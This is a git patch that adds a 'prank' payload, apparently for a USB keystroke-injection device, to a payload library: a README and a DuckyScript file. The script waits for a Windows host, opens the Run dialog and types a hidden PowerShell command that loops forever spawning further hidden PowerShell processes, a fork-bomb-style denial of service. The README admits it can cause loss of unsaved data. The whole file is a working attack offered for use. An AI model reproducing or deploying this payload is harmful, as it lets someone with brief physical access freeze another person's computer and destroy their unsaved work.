From 47fa68ecd9dfd302c661dfb153dba6ec2906b54f Mon Sep 17 00:00:00 2001 From: Aleff Date: Thu, 31 Oct 2024 08:16:18 +0100 Subject: [PATCH] Windows Spam Terminals --- .../prank/Windows-Spam-Terminals/README.md | 23 ++++++++ .../prank/Windows-Spam-Terminals/payload.txt | 58 +++++++++++++++++++ 2 files changed, 81 insertions(+) create mode 100644 payloads/library/prank/Windows-Spam-Terminals/README.md create mode 100644 payloads/library/prank/Windows-Spam-Terminals/payload.txt diff --git a/payloads/library/prank/Windows-Spam-Terminals/README.md b/payloads/library/prank/Windows-Spam-Terminals/README.md new file mode 100644 index 0000000..a3e3b84 --- /dev/null +++ b/payloads/library/prank/Windows-Spam-Terminals/README.md @@ -0,0 +1,23 @@ +# Windows Spam Terminals + +This script is designed to work on Windows devices. It opens an infinite number of PowerShell terminals, effectively spamming the system with terminal instances. + +Be very careful about using this payload as this activity could alter the state of the computer by causing unsaved data to be lost. For this reason make sure you are authorized before running this script otherwise you may risk a loss of data. + +### Details + +- **Title**: Windows Spam Terminals +- **Author**: bst04 - Aleff +- **Version**: 1.0 +- **Category**: Prank +- **Target**: Windows + +### Dependencies + +This payload is plug and play <3 + +## How It Works 📜 + +1. Uses an extension (`EXTENSION PASSIVE_WINDOWS_DETECT`) to detect when the device is ready +2. After readiness is confirmed, the script execute a powershell script that create an infinite number of PowerShell terminals + diff --git a/payloads/library/prank/Windows-Spam-Terminals/payload.txt b/payloads/library/prank/Windows-Spam-Terminals/payload.txt new file mode 100644 index 0000000..d4da62f --- /dev/null +++ b/payloads/library/prank/Windows-Spam-Terminals/payload.txt @@ -0,0 +1,58 @@ +REM_BLOCK +############################################ +# # +# Title : Windows Spam Terminals # +# Author : bst04 - Aleff # +# Version : 1.0 # +# Category : Prank # +# Target : Windows # +# # +############################################ +END_REM + +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION + +GUI r +DELAY 500 +STRINGLN powershell -w h -Command "while ($true) { Start-Process powershell -ArgumentList '-NoExit', '-Command', 'Start-Process powershell -w h -ArgumentList \"-NoExit\", \"-Command\", \"Start-Process powershell -w h\"' }" \ No newline at end of file